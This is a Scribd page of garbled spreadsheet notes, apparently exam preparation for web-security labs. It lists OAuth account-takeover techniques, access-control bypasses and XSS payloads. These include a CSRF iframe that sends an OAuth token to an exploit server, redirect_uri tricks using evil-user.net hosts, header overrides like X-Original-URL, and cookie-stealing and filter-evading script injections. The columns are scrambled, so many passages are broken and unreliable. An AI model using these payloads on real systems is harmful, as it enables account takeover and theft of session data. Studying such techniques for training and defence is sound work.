Scribd
Upload
18 views13 pages

BSCP3

Uploaded by

jhsdnck
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as XLSX, PDF, TXT or read online on Scribd
18 views13 pages

BSCP3

Uploaded by

jhsdnck
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as XLSX, PDF, TXT or read online on Scribd
You are on page 1/ 13

3.

Notice
that the
client
application
(the blog
website)
receives
some basic
informatio
1. In
n about
implicit
the user
grant type,
from the
once your
OAuth
user gets
service. It
the token,
Token not then logs check if
the user in
binded you can
OAuth by sending
with the a POST use it to
username request make
request for
containing
some other
this
user, by
informatio
changing
n to its
the
own
username
/authentica
te
endpoint,
along with
the access
token.

4. Send the
POST
/authentica
Requests: 1
User-Agent: Request 2 :
Mozilla/5.0 Change the
(Windows client ID with
NT 10.0; the one
- Login Win64; x64) received in
with Social AppleWebKi response
Media t/537.36
- (KHTML,
Redirecting like Gecko) GET
to social Chrome/122 /client/AnYu
media .0.6261.112 v47ARWOv
- Next Post Safari/537.3 h886310_z/l
6 ogo HTTP/2
- /.well-
Accept: Host: oauth-
known/oau OpenID
text/html,app 0aaa006a03
th- Dynamic 3534708255
authorizati Client lication/xhtm
l+xml,applic dbfe023000
on-server
Registrati ation/xml;q= 8b.oauth-
- /.well- https://oauth-0aaa006a033534708255dbfe0230008b.oauth-server.net/.well-known/openid-configura
If OPEN ID configuration is found & OAuth login is present on the OAUTH host, this mi
0.9,image/av server.net
known/ope on ( LOGO Cookie:
URI if,image/
nid- webp,image/ _session=J8
configurati /LOGO apng,*/ 2AfRm26PD
on URL ) *;q=0.8,appli avf54GTF0V
- If `Attach cation/ ;
with social signed- _session.leg
media`, exchange;v= acy=J82AfR
state b3;q=0.7 m26PDavf5
parameter Sec-Fetch- 4GTF0V
not Site: none Sec-Ch-Ua:
present Sec-Fetch- "Not(A:Bran
might be Mode: d";v="24",
the answer navigate "Chromium";
Sec-Fetch- v="122"
User: ?1 Sec-Ch-Ua-
Sec-Fetch- Mobile: ?0
Dest: Sec-Ch-Ua-
document Platform:
authorization COPY URL
code to link & DROP
the social
media GET /oauth-
account with linking?
the user code=gF3Jq
account. G69oIp7ML
oauth_linkin D622S5uDn
g? WqFlHa1yd
code=<code ShJsiqgh2Iy
> ( do not HTTP/2
forget to Host:
DROP this 0a7000bf04
request, as 563a1c82d5
we want to 881000ae00
make sure 7c.web-
STATE the token security-
remains academy.net
Parameter
unused ) Cookie: Host: oauth-0aaa006a033534708255dbfe023
Not
Present session=ud
- Since there Mr3rO72dqt
is no state LQVdTbU4b
parameter, VdyFmcA0T
we can use 7M
this token as Cache-
a CSRF Control:
injection max-age=0
vector, by Upgrade-
adding it to a Insecure-
iframe and Requests: 1
sending it to User-Agent:
the Mozilla/5.0
victim/admin (Windows
( comments NT 10.0;
) or via Win64; x64)
EXPLOIT AppleWebKi
SERVER t/537.36
payload for
the /auth EXPLOIT
request, SERVER
change the
redirect_uri <iframe
to your src="https:
attacker //oauth-
server's IP, 0a9900740
where the 305464781
CSRF 430fa5027
payload is a0066.oaut
present h-
and send it server.net/
to victim auth?
client_id=z
Unvalidat - Once the gpyqu5w9s
victim jvtf159a08
ed
clicks
Common Bypass on 4&redirect
:- https://default-host.com&@foo.evil-user.net- https://default-host.com#@bar.evil-
`redirect_ the link, _uri=https:
uri` we'll get //exploit-
the access 0ae000cf0
token, now 32d465381
when the 74106101b
website 30048.expl
makes oit-
request to server.net/
`/callback? exploit&res
code=<co ponse_type
de> to =code&sco
authenticat pe=openid
e you, %20profile
simply %20email"
replace ></
this code iframe>
with the
URI 3ea208880
mismatch 560bfa02d
error. 100ff.oaut
2. We have h-
a next post server.net/
functionality auth?
which is
client_id=
vulnerable to
mtyttcqiktk
open
redirect jol7896w7l
`https://0a5d &redirect_
002e037520 uri=https://
5a80980d0b 0a5d002e0
00a40069.w 375205a80
eb-security- 980d0b00a
academy.net 40069.web
/post/next? -security-
Open path=https:// academy.n
Redirect exploit- et/oauth-
with 0a8a007303 callback/../
OAuth 2.0 2020f78057 post/next?
0cdb019200 path=https
4d.exploit- ://exploit-
server.net/ 0a8a00730
exploit` 32020f780
3. We'll use 570cdb019
this in our 2004d.expl
iframe, oit-
deliver it, get server.net/
the token &
exploit/
login into
&response
administrato
r's account _type=tok
4. Intercept en&nonce
the reqeust =3997218
to `/me` and 27&scope
change the =openid
token in %20profile
Sec-Ch-Ua-
Mobile: ?0

1. Look for
different
places
Unprotect ( robots.txt
Access ed admin or do client
Control functional side code
ity review to
find any
important
end-point )
Access
Controlled
By 1. Check if any request parameter is used for access control, could be something in co
Reuqest
Parameter
1. Check
what all
update
functionalit
ies are
present in
the profile
section, for
example :
if there's
an email
update
functionalit
y, update
Modify your email
Access & notice
Control the
Through response.
Form
Submissio - Do you
n in user see any
profile access
control
related
parameter
s?
- Can you
submit the
request
with
changed
roleid ?

roleid:"2" -
>
roleid:"1"

X-Original-
1. Find out
URL
the end-
X-Rewrite-
point you
URL
want to
Bypass ----------------
access &
Access ----------------
try to
----------------
Control access it.
---------------
Via POST /
2. If you
Request fail try
HTTP/1.1
Headers different
X-Original-
headers to
URL:
overwrite
/admin/del
the URL &
eteUser
bypass it
...
1. Change
request
Changed HTTP
Request request
Method method
and access
the page

1. If the
validation
mechanis
m is case-
sensitive,
Case the
website
Sensitive
will
URL treate
Bypass /admin/del
eteuser &
ADMIN/DEL
ETEUSER
as different
end-points

1. Try to
look for
some
parameter
that might
be used to
identify the
IDOR
user. for
example :
userID=4,
try to
change it
to 3,2, or
1.
1. The
victim's
userID
might be
exposed in
some other
places on
Exposed the
Unpredict website,
able like
userID / comments,
Exposed blog author
user etc.
password 2. Study
in the
response response &
check if it
returns the
password
or any
other
crucial
element
the final
page only
if it has
gone
through
the first
two.

# Example
:
Normal
Flow :
home ->
page1 ->
page2 ->
page3
Vuln Flow :
Multi Step home ->
Process page1 ->
page3

# Example
Req 1 :
GET
/admin/upd
ate?
user=carlo
s&action=
upgrade
Req 2 :
GET
/admin/upd
ate?
user=carlo
s&confirme
d=yes&act
Referer
header will
be checked
for access
control, for
example :
a request
made to
Referer `/admin/de
leteUser`
Based
will expect
Access the referer
Control header to
have
`/admin` in
it, to make
sure it is
generated
from
admin
panel only.

Priority:
u=0, i

XSS Basic XSS

<script>alert(1)</script>
- Search
Bar
- Comment
Section With most
<§>
- DOM tags &
<body 1. Identify which tags are allowed <§>2. Identify what attributes/events are allowed <bo
Sinks attributes %20§§=1>
- Cookie blocked
with
httpOnly
not set
<xss+id=x
+onfocus=
alert(docu
Custom
ment.cooki
Tags e)
tabindex=
1>#x';

<svg><a>
<animate
+attribute
Name=hre
Event f+values=j
Handlers avascript:a
& Href lert(1)
Blocked /><text+x
=20+y=20
>Click
me</text>
</a>

1. If
Payloads
like
<svg>,
<animatetr
<§>
ansform>,
<svg><an
<title>,
imatetrans
and
form
<image>
SVG %20§§=1>
are
Markup
allowed
Allowed <svg><an
imatetrans
2. Identify
form
what
onbegin=al
events are
ert(1)>
allowed
<svg><an
imatetrans
form
%20§§=1>

Angular "onmouseo
Brackets ver="alert(
Encoded 1)

Put this
Quotes into a href
javascript:
HTML ( eg :
alert(1)
Encoded website
URL )
script><sc
ript>alert(
1)</
script>

For
example,
suppose
that the
input:

';alert(docu
ment.doma
in)//
With gets
Single converted
Quote to:
getting
Backslash \';alert(doc
escaped ument.do
( JS main)//
Context ) You can
now use
the
alternative
payload:

\';alert(doc
ument.do
main)//
which gets
converted
to:

\\';alert(do
cument.do

You might also like